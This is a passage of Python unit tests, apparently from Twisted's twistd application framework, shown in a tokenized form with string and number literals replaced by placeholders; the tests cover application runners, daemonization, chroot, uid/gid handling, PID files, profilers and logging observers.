def __init__ ( self , options ) : <EOL> app . ApplicationRunner . __init__ ( self , options ) <EOL> self . order = [ ] <EOL> self . logger = TestLoggerFactory ( self ) <EOL> def preApplication ( self ) : <EOL> self . order . append ( "<STR_LIT>" ) <EOL> self . hadApplicationPreApplication = hasattr ( self , '<STR_LIT>' ) <EOL> def postApplication ( self ) : <EOL> self . order . append ( "<STR_LIT>" ) <EOL> self . hadApplicationPostApplication = hasattr ( self , '<STR_LIT>' ) <EOL> class ApplicationRunnerTest ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> config = twistd . ServerOptions ( ) <EOL> self . serviceMaker = MockServiceMaker ( ) <EOL> config . loadedPlugins = { '<STR_LIT>' : self . serviceMaker } <EOL> config . subOptions = object ( ) <EOL> config . subCommand = '<STR_LIT>' <EOL> self . config = config <EOL> def test_applicationRunnerGetsCorrectApplication ( self ) : <EOL> """<STR_LIT>""" <EOL> arunner = CrippledApplicationRunner ( self . config ) <EOL> arunner . run ( ) <EOL> self . assertIdentical ( <EOL> self . serviceMaker . options , self . config . subOptions , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . assertIdentical ( <EOL> self . serviceMaker . service , <EOL> service . IService ( arunner . application ) . services [ <NUM_LIT:0> ] , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def test_preAndPostApplication ( self ) : <EOL> """<STR_LIT>""" <EOL> s = TestApplicationRunner ( self . config ) <EOL> s . run ( ) <EOL> self . assertFalse ( s . hadApplicationPreApplication ) <EOL> self . assertTrue ( s . hadApplicationPostApplication ) <EOL> self . assertTrue ( s . hadApplicationLogObserver ) <EOL> self . assertEqual ( s . order , [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> def _applicationStartsWithConfiguredID ( self , argv , uid , gid ) : <EOL> """<STR_LIT>""" <EOL> self . config . parseOptions ( argv ) <EOL> events = [ ] <EOL> class FakeUnixApplicationRunner ( twistd . _SomeApplicationRunner ) : <EOL> def setupEnvironment ( self , chroot , rundir , nodaemon , umask , <EOL> pidfile ) : <EOL> events . append ( '<STR_LIT>' ) <EOL> def shedPrivileges ( self , euid , uid , gid ) : <EOL> events . append ( ( '<STR_LIT>' , euid , uid , gid ) ) <EOL> def startReactor ( self , reactor , oldstdout , oldstderr ) : <EOL> events . append ( '<STR_LIT>' ) <EOL> def removePID ( self , pidfile ) : <EOL> pass <EOL> class FakeService ( object ) : <EOL> implements ( service . IService , service . IProcess ) <EOL> processName = None <EOL> uid = None <EOL> gid = None <EOL> def setName ( self , name ) : <EOL> pass <EOL> def setServiceParent ( self , parent ) : <EOL> pass <EOL> def disownServiceParent ( self ) : <EOL> pass <EOL> def privilegedStartService ( self ) : <EOL> events . append ( '<STR_LIT>' ) <EOL> def startService ( self ) : <EOL> events . append ( '<STR_LIT>' ) <EOL> def stopService ( self ) : <EOL> pass <EOL> application = FakeService ( ) <EOL> verifyObject ( service . IService , application ) <EOL> verifyObject ( service . IProcess , application ) <EOL> runner = FakeUnixApplicationRunner ( self . config ) <EOL> runner . preApplication ( ) <EOL> runner . application = application <EOL> runner . postApplication ( ) <EOL> self . assertEqual ( <EOL> events , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , <EOL> ( '<STR_LIT>' , False , uid , gid ) , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def test_applicationStartsWithConfiguredNumericIDs ( self ) : <EOL> """<STR_LIT>""" <EOL> uid = <NUM_LIT> <EOL> gid = <NUM_LIT> <EOL> self . _applicationStartsWithConfiguredID ( <EOL> [ "<STR_LIT>" , str ( uid ) , "<STR_LIT>" , str ( gid ) ] , uid , gid ) <EOL> test_applicationStartsWithConfiguredNumericIDs . skip = setuidSkip <EOL> def test_applicationStartsWithConfiguredNameIDs ( self ) : <EOL> """<STR_LIT>""" <EOL> user = "<STR_LIT:foo>" <EOL> uid = <NUM_LIT> <EOL> group = "<STR_LIT:bar>" <EOL> gid = <NUM_LIT> <EOL> patchUserDatabase ( self . patch , user , uid , group , gid ) <EOL> self . _applicationStartsWithConfiguredID ( <EOL> [ "<STR_LIT>" , user , "<STR_LIT>" , group ] , uid , gid ) <EOL> test_applicationStartsWithConfiguredNameIDs . skip = setuidSkip <EOL> def test_startReactorRunsTheReactor ( self ) : <EOL> """<STR_LIT>""" <EOL> reactor = DummyReactor ( ) <EOL> runner = app . ApplicationRunner ( { <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : False } ) <EOL> runner . startReactor ( reactor , None , None ) <EOL> self . assertTrue ( <EOL> reactor . called , "<STR_LIT>" ) <EOL> class UnixApplicationRunnerSetupEnvironmentTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> if _twistd_unix is None : <EOL> skip = "<STR_LIT>" <EOL> unset = object ( ) <EOL> def setUp ( self ) : <EOL> self . root = self . unset <EOL> self . cwd = self . unset <EOL> self . mask = self . unset <EOL> self . daemon = False <EOL> self . pid = os . getpid ( ) <EOL> self . patch ( os , '<STR_LIT>' , lambda path : setattr ( self , '<STR_LIT:root>' , path ) ) <EOL> self . patch ( os , '<STR_LIT>' , lambda path : setattr ( self , '<STR_LIT>' , path ) ) <EOL> self . patch ( os , '<STR_LIT>' , lambda mask : setattr ( self , '<STR_LIT>' , mask ) ) <EOL> self . patch ( _twistd_unix , "<STR_LIT>" , self . daemonize ) <EOL> self . runner = UnixApplicationRunner ( { } ) <EOL> def daemonize ( self , reactor , os ) : <EOL> """<STR_LIT>""" <EOL> self . daemon = True <EOL> self . patch ( os , '<STR_LIT>' , lambda : self . pid + <NUM_LIT:1> ) <EOL> def test_chroot ( self ) : <EOL> """<STR_LIT>""" <EOL> self . runner . setupEnvironment ( "<STR_LIT>" , "<STR_LIT:.>" , True , None , None ) <EOL> self . assertEqual ( self . root , "<STR_LIT>" ) <EOL> def test_noChroot ( self ) : <EOL> """<STR_LIT>""" <EOL> self . runner . setupEnvironment ( None , "<STR_LIT:.>" , True , None , None ) <EOL> self . assertIdentical ( self . root , self . unset ) <EOL> def test_changeWorkingDirectory ( self ) : <EOL> """<STR_LIT>""" <EOL> self . runner . setupEnvironment ( None , "<STR_LIT>" , True , None , None ) <EOL> self . assertEqual ( self . cwd , "<STR_LIT>" ) <EOL> def test_daemonize ( self ) : <EOL> """<STR_LIT>""" <EOL> self . runner . setupEnvironment ( None , "<STR_LIT:.>" , False , None , None ) <EOL> self . assertTrue ( self . daemon ) <EOL> def test_noDaemonize ( self ) : <EOL> """<STR_LIT>""" <EOL> self . runner . setupEnvironment ( None , "<STR_LIT:.>" , True , None , None ) <EOL> self . assertFalse ( self . daemon ) <EOL> def test_nonDaemonPIDFile ( self ) : <EOL> """<STR_LIT>""" <EOL> pidfile = self . mktemp ( ) <EOL> self . runner . setupEnvironment ( None , "<STR_LIT:.>" , True , None , pidfile ) <EOL> fObj = file ( pidfile ) <EOL> pid = int ( fObj . read ( ) ) <EOL> fObj . close ( ) <EOL> self . assertEqual ( pid , self . pid ) <EOL> def test_daemonPIDFile ( self ) : <EOL> """<STR_LIT>""" <EOL> pidfile = self . mktemp ( ) <EOL> self . runner . setupEnvironment ( None , "<STR_LIT:.>" , False , None , pidfile ) <EOL> fObj = file ( pidfile ) <EOL> pid = int ( fObj . read ( ) ) <EOL> fObj . close ( ) <EOL> self . assertEqual ( pid , self . pid + <NUM_LIT:1> ) <EOL> def test_umask ( self ) : <EOL> """<STR_LIT>""" <EOL> self . runner . setupEnvironment ( None , "<STR_LIT:.>" , False , <NUM_LIT> , None ) <EOL> self . assertEqual ( self . mask , <NUM_LIT> ) <EOL> def test_noDaemonizeNoUmask ( self ) : <EOL> """<STR_LIT>""" <EOL> self . runner . setupEnvironment ( None , "<STR_LIT:.>" , True , None , None ) <EOL> self . assertIdentical ( self . mask , self . unset ) <EOL> def test_daemonizedNoUmask ( self ) : <EOL> """<STR_LIT>""" <EOL> self . runner . setupEnvironment ( None , "<STR_LIT:.>" , False , None , None ) <EOL> self . assertEqual ( self . mask , <NUM_LIT> <NUM_LIT> ) <EOL> class UnixApplicationRunnerStartApplicationTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> if _twistd_unix is None : <EOL> skip = "<STR_LIT>" <EOL> def test_setupEnvironment ( self ) : <EOL> """<STR_LIT>""" <EOL> options = twistd . ServerOptions ( ) <EOL> options . parseOptions ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> application = service . Application ( "<STR_LIT>" ) <EOL> self . runner = UnixApplicationRunner ( options ) <EOL> args = [ ] <EOL> def fakeSetupEnvironment ( self , chroot , rundir , nodaemon , umask , pidfile ) : <EOL> args . extend ( ( chroot , rundir , nodaemon , umask , pidfile ) ) <EOL> self . assertEqual ( <EOL> inspect . getargspec ( self . runner . setupEnvironment ) , <EOL> inspect . getargspec ( fakeSetupEnvironment ) ) <EOL> self . patch ( UnixApplicationRunner , '<STR_LIT>' , fakeSetupEnvironment ) <EOL> self . patch ( UnixApplicationRunner , '<STR_LIT>' , lambda * a , ** kw : None ) <EOL> self . patch ( app , '<STR_LIT>' , lambda * a , ** kw : None ) <EOL> self . runner . startApplication ( application ) <EOL> self . assertEqual ( <EOL> args , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , True , <NUM_LIT> , '<STR_LIT>' ] ) <EOL> class UnixApplicationRunnerRemovePID ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> if _twistd_unix is None : <EOL> skip = "<STR_LIT>" <EOL> def test_removePID ( self ) : <EOL> """<STR_LIT>""" <EOL> runner = UnixApplicationRunner ( { } ) <EOL> path = self . mktemp ( ) <EOL> os . makedirs ( path ) <EOL> pidfile = os . path . join ( path , "<STR_LIT>" ) <EOL> file ( pidfile , "<STR_LIT:w>" ) . close ( ) <EOL> runner . removePID ( pidfile ) <EOL> self . assertFalse ( os . path . exists ( pidfile ) ) <EOL> def test_removePIDErrors ( self ) : <EOL> """<STR_LIT>""" <EOL> runner = UnixApplicationRunner ( { } ) <EOL> runner . removePID ( "<STR_LIT>" ) <EOL> errors = self . flushLoggedErrors ( OSError ) <EOL> self . assertEqual ( len ( errors ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( errors [ <NUM_LIT:0> ] . value . errno , errno . ENOENT ) <EOL> class FakeNonDaemonizingReactor ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . _beforeDaemonizeCalled = False <EOL> self . _afterDaemonizeCalled = False <EOL> def beforeDaemonize ( self ) : <EOL> self . _beforeDaemonizeCalled = True <EOL> def afterDaemonize ( self ) : <EOL> self . _afterDaemonizeCalled = True <EOL> class FakeDaemonizingReactor ( FakeNonDaemonizingReactor ) : <EOL> """<STR_LIT>""" <EOL> implements ( IReactorDaemonize ) <EOL> class ReactorDaemonizationTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> if _twistd_unix is None : <EOL> skip = "<STR_LIT>" <EOL> def test_daemonizationHooksCalled ( self ) : <EOL> """<STR_LIT>""" <EOL> reactor = FakeDaemonizingReactor ( ) <EOL> os = MockOS ( ) <EOL> _twistd_unix . daemonize ( reactor , os ) <EOL> self . assertTrue ( reactor . _beforeDaemonizeCalled ) <EOL> self . assertTrue ( reactor . _afterDaemonizeCalled ) <EOL> def test_daemonizationHooksNotCalled ( self ) : <EOL> """<STR_LIT>""" <EOL> reactor = FakeNonDaemonizingReactor ( ) <EOL> os = MockOS ( ) <EOL> _twistd_unix . daemonize ( reactor , os ) <EOL> self . assertFalse ( reactor . _beforeDaemonizeCalled ) <EOL> self . assertFalse ( reactor . _afterDaemonizeCalled ) <EOL> class DummyReactor ( object ) : <EOL> """<STR_LIT>""" <EOL> called = False <EOL> def run ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . called : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> self . called = True <EOL> class AppProfilingTestCase ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_profile ( self ) : <EOL> """<STR_LIT>""" <EOL> config = twistd . ServerOptions ( ) <EOL> config [ "<STR_LIT>" ] = self . mktemp ( ) <EOL> config [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> profiler = app . AppProfiler ( config ) <EOL> reactor = DummyReactor ( ) <EOL> profiler . run ( reactor ) <EOL> self . assertTrue ( reactor . called ) <EOL> data = file ( config [ "<STR_LIT>" ] ) . read ( ) <EOL> self . assertIn ( "<STR_LIT>" , data ) <EOL> self . assertIn ( "<STR_LIT>" , data ) <EOL> if profile is None : <EOL> test_profile . skip = "<STR_LIT>" <EOL> def _testStats ( self , statsClass , profile ) : <EOL> out = StringIO . StringIO ( ) <EOL> stdout = self . patch ( sys , '<STR_LIT>' , out ) <EOL> stats = statsClass ( profile ) <EOL> stats . print_stats ( ) <EOL> stdout . restore ( ) <EOL> data = out . getvalue ( ) <EOL> self . assertIn ( "<STR_LIT>" , data ) <EOL> self . assertIn ( "<STR_LIT>" , data ) <EOL> def test_profileSaveStats ( self ) : <EOL> """<STR_LIT>""" <EOL> config = twistd . ServerOptions ( ) <EOL> config [ "<STR_LIT>" ] = self . mktemp ( ) <EOL> config [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> config [ "<STR_LIT>" ] = True <EOL> profiler = app . AppProfiler ( config ) <EOL> reactor = DummyReactor ( ) <EOL> profiler . run ( reactor ) <EOL> self . assertTrue ( reactor . called ) <EOL> self . _testStats ( pstats . Stats , config [ '<STR_LIT>' ] ) <EOL> if profile is None : <EOL> test_profileSaveStats . skip = "<STR_LIT>" <EOL> def test_withoutProfile ( self ) : <EOL> """<STR_LIT>""" <EOL> savedModules = sys . modules . copy ( ) <EOL> config = twistd . ServerOptions ( ) <EOL> config [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> profiler = app . AppProfiler ( config ) <EOL> sys . modules [ "<STR_LIT>" ] = None <EOL> try : <EOL> self . assertRaises ( SystemExit , profiler . run , None ) <EOL> finally : <EOL> sys . modules . clear ( ) <EOL> sys . modules . update ( savedModules ) <EOL> def test_profilePrintStatsError ( self ) : <EOL> """<STR_LIT>""" <EOL> class ErroneousProfile ( profile . Profile ) : <EOL> def print_stats ( self ) : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> self . patch ( profile , "<STR_LIT>" , ErroneousProfile ) <EOL> config = twistd . ServerOptions ( ) <EOL> config [ "<STR_LIT>" ] = self . mktemp ( ) <EOL> config [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> profiler = app . AppProfiler ( config ) <EOL> reactor = DummyReactor ( ) <EOL> oldStdout = sys . stdout <EOL> self . assertRaises ( RuntimeError , profiler . run , reactor ) <EOL> self . assertIdentical ( sys . stdout , oldStdout ) <EOL> if profile is None : <EOL> test_profilePrintStatsError . skip = "<STR_LIT>" <EOL> def test_hotshot ( self ) : <EOL> """<STR_LIT>""" <EOL> config = twistd . ServerOptions ( ) <EOL> config [ "<STR_LIT>" ] = self . mktemp ( ) <EOL> config [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> profiler = app . AppProfiler ( config ) <EOL> reactor = DummyReactor ( ) <EOL> profiler . run ( reactor ) <EOL> self . assertTrue ( reactor . called ) <EOL> data = file ( config [ "<STR_LIT>" ] ) . read ( ) <EOL> self . assertIn ( "<STR_LIT>" , data ) <EOL> self . assertIn ( "<STR_LIT>" , data ) <EOL> if hotshot is None : <EOL> test_hotshot . skip = "<STR_LIT>" <EOL> def test_hotshotSaveStats ( self ) : <EOL> """<STR_LIT>""" <EOL> config = twistd . ServerOptions ( ) <EOL> config [ "<STR_LIT>" ] = self . mktemp ( ) <EOL> config [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> config [ "<STR_LIT>" ] = True <EOL> profiler = app . AppProfiler ( config ) <EOL> reactor = DummyReactor ( ) <EOL> profiler . run ( reactor ) <EOL> self . assertTrue ( reactor . called ) <EOL> self . _testStats ( hotshot . stats . load , config [ '<STR_LIT>' ] ) <EOL> if hotshot is None : <EOL> test_hotshotSaveStats . skip = "<STR_LIT>" <EOL> def test_withoutHotshot ( self ) : <EOL> """<STR_LIT>""" <EOL> savedModules = sys . modules . copy ( ) <EOL> sys . modules [ "<STR_LIT>" ] = None <EOL> config = twistd . ServerOptions ( ) <EOL> config [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> profiler = app . AppProfiler ( config ) <EOL> try : <EOL> self . assertRaises ( SystemExit , profiler . run , None ) <EOL> finally : <EOL> sys . modules . clear ( ) <EOL> sys . modules . update ( savedModules ) <EOL> def test_hotshotPrintStatsError ( self ) : <EOL> """<STR_LIT>""" <EOL> class ErroneousStats ( pstats . Stats ) : <EOL> def print_stats ( self ) : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> self . patch ( pstats , "<STR_LIT>" , ErroneousStats ) <EOL> config = twistd . ServerOptions ( ) <EOL> config [ "<STR_LIT>" ] = self . mktemp ( ) <EOL> config [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> profiler = app . AppProfiler ( config ) <EOL> reactor = DummyReactor ( ) <EOL> oldStdout = sys . stdout <EOL> self . assertRaises ( RuntimeError , profiler . run , reactor ) <EOL> self . assertIdentical ( sys . stdout , oldStdout ) <EOL> if hotshot is None : <EOL> test_hotshotPrintStatsError . skip = "<STR_LIT>" <EOL> def test_cProfile ( self ) : <EOL> """<STR_LIT>""" <EOL> config = twistd . ServerOptions ( ) <EOL> config [ "<STR_LIT>" ] = self . mktemp ( ) <EOL> config [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> profiler = app . AppProfiler ( config ) <EOL> reactor = DummyReactor ( ) <EOL> profiler . run ( reactor ) <EOL> self . assertTrue ( reactor . called ) <EOL> data = file ( config [ "<STR_LIT>" ] ) . read ( ) <EOL> self . assertIn ( "<STR_LIT>" , data ) <EOL> self . assertIn ( "<STR_LIT>" , data ) <EOL> if cProfile is None : <EOL> test_cProfile . skip = "<STR_LIT>" <EOL> def test_cProfileSaveStats ( self ) : <EOL> """<STR_LIT>""" <EOL> config = twistd . ServerOptions ( ) <EOL> config [ "<STR_LIT>" ] = self . mktemp ( ) <EOL> config [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> config [ "<STR_LIT>" ] = True <EOL> profiler = app . AppProfiler ( config ) <EOL> reactor = DummyReactor ( ) <EOL> profiler . run ( reactor ) <EOL> self . assertTrue ( reactor . called ) <EOL> self . _testStats ( pstats . Stats , config [ '<STR_LIT>' ] ) <EOL> if cProfile is None : <EOL> test_cProfileSaveStats . skip = "<STR_LIT>" <EOL> def test_withoutCProfile ( self ) : <EOL> """<STR_LIT>""" <EOL> savedModules = sys . modules . copy ( ) <EOL> sys . modules [ "<STR_LIT>" ] = None <EOL> config = twistd . ServerOptions ( ) <EOL> config [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> profiler = app . AppProfiler ( config ) <EOL> try : <EOL> self . assertRaises ( SystemExit , profiler . run , None ) <EOL> finally : <EOL> sys . modules . clear ( ) <EOL> sys . modules . update ( savedModules ) <EOL> def test_unknownProfiler ( self ) : <EOL> """<STR_LIT>""" <EOL> config = twistd . ServerOptions ( ) <EOL> config [ "<STR_LIT>" ] = self . mktemp ( ) <EOL> config [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> error = self . assertRaises ( SystemExit , app . AppProfiler , config ) <EOL> self . assertEqual ( str ( error ) , "<STR_LIT>" ) <EOL> def test_defaultProfiler ( self ) : <EOL> """<STR_LIT>""" <EOL> profiler = app . AppProfiler ( { } ) <EOL> self . assertEqual ( profiler . profiler , "<STR_LIT>" ) <EOL> def test_profilerNameCaseInsentive ( self ) : <EOL> """<STR_LIT>""" <EOL> profiler = app . AppProfiler ( { "<STR_LIT>" : "<STR_LIT>" } ) <EOL> self . assertEqual ( profiler . profiler , "<STR_LIT>" ) <EOL> def _patchFileLogObserver ( patch ) : <EOL> """<STR_LIT>""" <EOL> logFiles = [ ] <EOL> oldFileLobObserver = log . FileLogObserver <EOL> def FileLogObserver ( logFile ) : <EOL> logFiles . append ( logFile ) <EOL> return oldFileLobObserver ( logFile ) <EOL> patch ( log , '<STR_LIT>' , FileLogObserver ) <EOL> return logFiles <EOL> def _setupSyslog ( testCase ) : <EOL> """<STR_LIT>""" <EOL> logMessages = [ ] <EOL> class fakesyslogobserver ( object ) : <EOL> def __init__ ( self , prefix ) : <EOL> logMessages . append ( prefix ) <EOL> def emit ( self , eventDict ) : <EOL> logMessages . append ( eventDict ) <EOL> testCase . patch ( syslog , "<STR_LIT>" , fakesyslogobserver ) <EOL> return logMessages <EOL> class AppLoggerTestCase ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> self . observers = [ ] <EOL> def startLoggingWithObserver ( observer ) : <EOL> self . observers . append ( observer ) <EOL> log . addObserver ( observer ) <EOL> self . patch ( log , '<STR_LIT>' , startLoggingWithObserver ) <EOL> def tearDown ( self ) : <EOL> """<STR_LIT>""" <EOL> for observer in self . observers : <EOL> log . removeObserver ( observer ) <EOL> def _checkObserver ( self , logs ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . observers , [ logs . append ] ) <EOL> self . assertIn ( "<STR_LIT>" , logs [ <NUM_LIT:0> ] [ "<STR_LIT:message>" ] [ <NUM_LIT:0> ] ) <EOL> self . assertIn ( "<STR_LIT>" , logs [ <NUM_LIT:1> ] [ "<STR_LIT:message>" ] [ <NUM_LIT:0> ] ) <EOL> def test_start ( self ) : <EOL> """<STR_LIT>""" <EOL> logger = app . AppLogger ( { } ) <EOL> observer = [ ] <EOL> logger . _getLogObserver = lambda : observer . append <EOL> logger . start ( Componentized ( ) ) <EOL> self . _checkObserver ( observer ) <EOL> def test_startUsesApplicationLogObserver ( self ) : <EOL> """<STR_LIT>""" <EOL> application = Componentized ( ) <EOL> logs = [ ] <EOL> application . setComponent ( ILogObserver , logs . append ) <EOL> logger = app . AppLogger ( { } ) <EOL> logger . start ( application ) <EOL> self . _checkObserver ( logs ) <EOL> def _setupConfiguredLogger ( self , application , extraLogArgs = { } , <EOL> appLogger = app . AppLogger ) : <EOL> """<STR_LIT>""" <EOL> logs = [ ] <EOL> logArgs = { "<STR_LIT>" : lambda : logs . append } <EOL> logArgs . update ( extraLogArgs ) <EOL> logger = appLogger ( logArgs ) <EOL> logger . start ( application ) <EOL> return logs <EOL> def test_startUsesConfiguredLogObserver ( self ) : <EOL> """<STR_LIT>""" <EOL> application = Componentized ( ) <EOL> self . _checkObserver ( self . _setupConfiguredLogger ( application ) ) <EOL> def test_configuredLogObserverBeatsComponent ( self ) : <EOL> """<STR_LIT>""" <EOL> nonlogs = [ ] <EOL> application = Componentized ( ) <EOL> application . setComponent ( ILogObserver , nonlogs . append ) <EOL> self . _checkObserver ( self . _setupConfiguredLogger ( application ) ) <EOL> self . assertEqual ( nonlogs , [ ] ) <EOL> def test_configuredLogObserverBeatsSyslog ( self ) : <EOL> """<STR_LIT>""" <EOL> logs = _setupSyslog ( self ) <EOL> application = Componentized ( ) <EOL> self . _checkObserver ( self . _setupConfiguredLogger ( application , <EOL> { "<STR_LIT>" : True } , <EOL> UnixAppLogger ) ) <EOL> self . assertEqual ( logs , [ ] ) <EOL> if _twistd_unix is None or syslog is None : <EOL> test_configuredLogObserverBeatsSyslog . skip = "<STR_LIT>" <EOL> def test_configuredLogObserverBeatsLogfile ( self ) : <EOL> """<STR_LIT>""" <EOL> application = Componentized ( ) <EOL> path = self . mktemp ( ) <EOL> self . _checkObserver ( self . _setupConfiguredLogger ( application , <EOL> { "<STR_LIT>" : "<STR_LIT:path>" } ) ) <EOL> self . assertFalse ( os . path . exists ( path ) ) <EOL> def test_getLogObserverStdout ( self ) : <EOL> """<STR_LIT>""" <EOL> logger = app . AppLogger ( { "<STR_LIT>" : "<STR_LIT:->" } ) <EOL> logFiles = _patchFileLogObserver ( self . patch ) <EOL> observer = logger . _getLogObserver ( ) <EOL> self . assertEqual ( len ( logFiles ) , <NUM_LIT:1> ) <EOL> self . assertIdentical ( logFiles [ <NUM_LIT:0> ] , sys . stdout ) <EOL> logger = app . AppLogger ( { "<STR_LIT>" : "<STR_LIT>" } ) <EOL> observer = logger . _getLogObserver ( ) <EOL> self . assertEqual ( len ( logFiles ) , <NUM_LIT:2> ) <EOL> self . assertIdentical ( logFiles [ <NUM_LIT:1> ] , sys . stdout ) <EOL> def test_getLogObserverFile ( self ) : <EOL> """<STR_LIT>""" <EOL> logFiles = _patchFileLogObserver ( self . patch ) <EOL> filename = self . mktemp ( ) <EOL> logger = app . AppLogger ( { "<STR_LIT>" : filename } ) <EOL> observer = logger . _getLogObserver ( ) <EOL> self . assertEqual ( len ( logFiles ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( logFiles [ <NUM_LIT:0> ] . path , <EOL> os . path . abspath ( filename ) ) <EOL> def test_stop ( self ) : <EOL> """<STR_LIT>""" <EOL> removed = [ ] <EOL> observer = object ( ) <EOL> def remove ( observer ) : <EOL> removed . append ( observer ) <EOL> self . patch ( log , '<STR_LIT>' , remove ) <EOL> logger = app . AppLogger ( { } ) <EOL> logger . _observer = observer <EOL> logger . stop ( ) <EOL> self . assertEqual ( removed , [ observer ] ) <EOL> logger . stop ( ) <EOL> self . assertEqual ( removed , [ observer ] ) <EOL> self . assertIdentical ( logger . _observer , None ) <EOL> class UnixAppLoggerTestCase ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> if _twistd_unix is None : <EOL> skip = "<STR_LIT>" <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> self . signals = [ ] <EOL> def fakeSignal ( sig , f ) : <EOL> self . signals . append ( ( sig , f ) ) <EOL> self . patch ( signal , "<STR_LIT>" , fakeSignal ) <EOL> def test_getLogObserverStdout ( self ) : <EOL> """<STR_LIT>""" <EOL> logFiles = _patchFileLogObserver ( self . patch ) <EOL> logger = UnixAppLogger ( { "<STR_LIT>" : "<STR_LIT:->" , "<STR_LIT>" : True } ) <EOL> observer = logger . _getLogObserver ( ) <EOL> self . assertEqual ( len ( logFiles ) , <NUM_LIT:1> ) <EOL> self . assertIdentical ( logFiles [ <NUM_LIT:0> ] , sys . stdout ) <EOL> logger = UnixAppLogger ( { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : True } ) <EOL> observer = logger . _getLogObserver ( ) <EOL> self . assertEqual ( len ( logFiles ) , <NUM_LIT:2> ) <EOL> self . assertIdentical ( logFiles [ <NUM_LIT:1> ] , sys . stdout ) <EOL> def test_getLogObserverStdoutDaemon ( self ) : <EOL> """<STR_LIT>""" <EOL> logger = UnixAppLogger ( { "<STR_LIT>" : "<STR_LIT:->" , "<STR_LIT>" : False } ) <EOL> error = self . assertRaises ( SystemExit , logger . _getLogObserver ) <EOL> self . assertEqual ( str ( error ) , "<STR_LIT>" ) <EOL> def test_getLogObserverFile ( self ) : <EOL> """<STR_LIT>""" <EOL> logFiles = _patchFileLogObserver ( self . patch ) <EOL> filename = self . mktemp ( ) <EOL> logger = UnixAppLogger ( { "<STR_LIT>" : filename } ) <EOL> observer = logger . _getLogObserver ( ) <EOL> self . assertEqual ( len ( logFiles ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( logFiles [ <NUM_LIT:0> ] . path , <EOL> os . path . abspath ( filename ) ) <EOL> self . assertEqual ( len ( self . signals ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( self . signals [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] , signal . SIGUSR1 ) <EOL> d = Deferred ( ) <EOL> def rotate ( ) : <EOL> d . callback ( None ) <EOL> logFiles [ <NUM_LIT:0> ] . rotate = rotate <EOL> rotateLog = self . signals [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] <EOL> rotateLog ( None , None ) <EOL> return d <EOL> def test_getLogObserverDontOverrideSignalHandler ( self ) : <EOL> """<STR_LIT>""" <EOL> def fakeGetSignal ( sig ) : <EOL> self . assertEqual ( sig , signal . SIGUSR1 ) <EOL> return object ( ) <EOL> self . patch ( signal , "<STR_LIT>" , fakeGetSignal ) <EOL> filename = self . mktemp ( ) <EOL> logger = UnixAppLogger ( { "<STR_LIT>" : filename } ) <EOL> observer = logger . _getLogObserver ( ) <EOL> self . assertEqual ( self . signals , [ ] ) <EOL> def test_getLogObserverDefaultFile ( self ) : <EOL> """<STR_LIT>""" <EOL> logFiles = _patchFileLogObserver ( self . patch ) <EOL> logger = UnixAppLogger ( { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : False } ) <EOL> observer = logger . _getLogObserver ( ) <EOL> self . assertEqual ( len ( logFiles ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( logFiles [ <NUM_LIT:0> ] . path , <EOL> os . path . abspath ( "<STR_LIT>" ) ) <EOL> def test_getLogObserverSyslog ( self ) : <EOL> """<STR_LIT>""" <EOL> logs = _setupSyslog ( self ) <EOL> logger = UnixAppLogger ( { "<STR_LIT>" : True , "<STR_LIT>" : "<STR_LIT>" } ) <EOL> observer = logger . _getLogObserver ( ) <EOL> self . assertEqual ( logs , [ "<STR_LIT>" ] ) <EOL> observer ( { "<STR_LIT:a>" : "<STR_LIT:b>" } ) <EOL> self . assertEqual ( logs , [ "<STR_LIT>" , { "<STR_LIT:a>" : "<STR_LIT:b>" } ] ) <EOL> if syslog is None : <EOL> test_getLogObserverSyslog . skip = "<STR_LIT>" </s>
